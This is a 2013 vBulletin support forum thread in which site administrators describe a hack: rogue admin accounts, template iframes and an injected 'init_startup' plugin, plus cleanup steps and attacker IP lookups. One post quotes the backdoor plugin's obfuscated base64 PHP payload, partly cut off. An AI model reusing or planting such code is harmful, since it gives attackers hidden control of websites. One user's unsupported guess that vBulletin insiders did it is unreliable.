Announcement

Collapse
No announcement yet.

Forum hacked...

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Martyn_s30v
    replied
    I'd like to know what the common factor is here, everyone on vb 4.2.0? Install folder?

    Leave a comment:


  • Martyn_s30v
    replied
    I got hacked this morning too. Running vb 4.2.0 exact same exploit by the looks of it. There were a couple of new admin accounts and subscriptions got locked into a pluging same as above...

    title - init_startup

    Deleting that pluging got my subscriptions page back. I did have the install directory, which has now been deleted.

    Leave a comment:


  • rburns
    replied
    I have had the same problem, at 7.30 this morning.

    I managed to catch and delete most of it, but I have a different page on paid subscriptions now.

    The username was 30K and the IP was 178.73.207.151. and apprently came from Sweden!

    They added the plugin stated above, and added URL's to mt templates (do a search for .biz or derpina in your templates). They used iframes.

    I've now found a script in my header at the bottom, I've now got rid of it.

    Best way I can advise to find all your issues is to go to
    http://quttera.com and put in a free check, it found everything on my site, and then all I needed to do was search the templates to get rid of it. If I find anymore I will let you know here.

    VB, I am not happy that people are able to do this, I pay to have a site that is safe from these actions.

    Is there a way to make the system email you every time someone changes something in the Admin CP? Or changes certain things (plugins, users, forums). That way we will see this happening a lot faster and get in to stop it.
    Last edited by rburns; Tue 10th Sep '13, 1:29am.

    Leave a comment:


  • LBmtb
    replied
    Major hackage here as well for the last two days. I *think* I've cleaned up the last of it. Similar symptoms... weird admin accounts, crazy plugins, redirects, code being inserted into templates and phrases.

    Is anybody else here annoyed that we paid decent money for this (relative to other forum solutions) and have had so many security headaches?

    Leave a comment:


  • Zachery
    replied
    Please read the following two blog posts:
    http://www.vbulletin.com/forum/blogs...ve-been-hacked

    http://www.vbulletin.com/forum/blogs...vbulletin-site

    Also please see these recent security announcements:

    vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
    vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions

    Leave a comment:


  • Jaxo
    replied
    Found it !!!

    They added this plugin..

    title - init_startup
    Hook location - init_startup
    Plugin PHP codecERWQmlxUlpXaWNENTYwSlZoZytOc1pLUkZPcnhxcm44eG5OS1NYQ0RmMm9nbnM0M2VyRGJ6cmFwK3VNZzRSZWcwcj gyNEZ6b0xoNWNsSlZoYStNZ2FuWTJCZTdtQms0c2NJck1mTFZOZmJuSjdpRDF4Y21mTkl1Yk1yOWpmYkJTNk04YUpv bERzeVBCWkdRczE4bzJtTjZDeXRienAvYnltOTBYVERhN3R0dGIzYzF1dkpXeis4OTNSdjBOMzlNM3UrQ1l1OTJRdm lXeTl0cE1UbDZQa0tPTnNhcE0xcCtmUUtBcVpqV2RkK2lwWHFqd1BVOUR4QWlDV0VPSlRnUUJCQnNqNzArTXViQUxv RGxKQVlPUUhDdnlBMlRzWTltR0VsaHNxSUFRWGIrcXVqdDBRMkg4S05ldm9RWE81VGhPMmdKeXd1dFFYMmJDb2pveH VxcWxLZWJpcUx1OHZ1dGhuVmpyUEkzMURDdHlJc09wdy9ZWUpZZ1E3TlFEdFU3ZC9pQUhsdWNsWldxTHBDREhETW1y U3plbzd2dC9GUzNRWFN4V0JvdEVhV3JQK2Z3PT0nKSkpOw0KLyogYnkgaGlqQGNrZXIgKi8='));
    exit;
    }
    Have just disabled it and all seems to be working !

    Leave a comment:


  • Jaxo
    replied
    I have added this line to my config.php and now have access to the subscriptions section. so It has to be a plugin then? Its strange though that i disabling all the plugins does not sort the problem.

    Leave a comment:


  • Jaxo
    replied
    Ok, so I have disabled all my plugins and the problem persists.I have also over wrote all my files (was running 4.2.0 patch 2 and uploaded 4.2.1) but still have the problem. Any other suggestions?

    Leave a comment:


  • Jamsoft
    replied
    Originally posted by Wayne Luke View Post
    Has to be a plugin doing that. You would have to find the plugin and delete it.
    They may have also overwritten your subscription.php. You should not be challenged with a password, there. Check to see if the size of subscription.php is different from what comes in the installation. If so, you cannot trust your files and will need to re-upload. I've seen a TON of sites hit this way

    Leave a comment:


  • Ion Saliu
    replied
    Originally posted by Ion Saliu View Post
    That repeated IP in your post 37.130.224.22 shows this data:

    Country:
    Netherlands nl

    State/Region:
    Noord-Holland

    City:
    Amsterdam

    If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!

    I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.

    But, then again, it struck me as well as other admins:

    WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?
    One more IP to ban and thus be safer... the IP you posted, axiomaticule:
    37.130.224.22
    629334038
    2582e016.rdns.100tb.com
    Hosting Services
    Hosting Services
    Network sharing device or proxy server
    Recently reported forum spam source. (2)

    Country:
    Netherlands nl

    State/Region:
    Noord-Holland

    City:
    Amsterdam

    Leave a comment:


  • Jaxo
    replied
    That didnt work very well,.. here is the link

    http://www.ip-adress.com/ip_tracer/37.130.224.22

    Leave a comment:


  • Jaxo
    replied
    Originally posted by Ion Saliu View Post
    That repeated IP in your post 37.130.224.22 shows this data:

    Country:
    Netherlands nl

    State/Region:
    Noord-Holland

    City:
    Amsterdam

    If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!

    I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.

    But, then again, it struck me as well as other admins:

    WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?

    Have had a bit of a search myself and came up with the same result.. its originating in netherlands.
    37.130.224.22 - IP Tracing and IP Tracking

    Want to trace or track an IP Address, host, or website easily? With our highly reliable IP Address Location Database, you can get detailed information on any IP Address anywhere in the world. Results include detailed IP address location, name of ISP, netspeed/speed of internet connection, and more.















    Click for big IP address location image. It is 8:44 PM UTC when you ran this IP tracer report for 37.130.224.22 here on our website, IP-Adress.com. When it comes to 37.130.224.22, you can trust that if we have all the IP trace information possible for it, then we will display it further below to assist in your research of this IP address if available. Feel free to run another IP trace for 37.130.224.22 or a different search.
    Timestamp Confirmation:
    The IP tracer report for 37.130.224.22 was ran at 8:44 PM UTC on September 9, 2013 and the information is provided below if available.


    Think i best have a look and see if it matches any members :?

    Leave a comment:


  • Wayne Luke
    replied
    Has to be a plugin doing that. You would have to find the plugin and delete it.

    Leave a comment:


  • Jaxo
    replied
    Originally posted by Wayne Luke View Post

    I am not sure what you mean. There are no passwords on paid subscriptions.

    When I go to paid subscription in my admin panel no matter what tab i click it asks for a password... Looking at the logs this seems to be something they where tampering with ?

    Attached Files

    Leave a comment:


  • Ion Saliu
    replied
    That repeated IP in your post 37.130.224.22 shows this data:

    Country:
    Netherlands nl

    State/Region:
    Noord-Holland

    City:
    Amsterdam

    If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!

    I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.

    But, then again, it struck me as well as other admins:

    WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?

    Leave a comment:

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X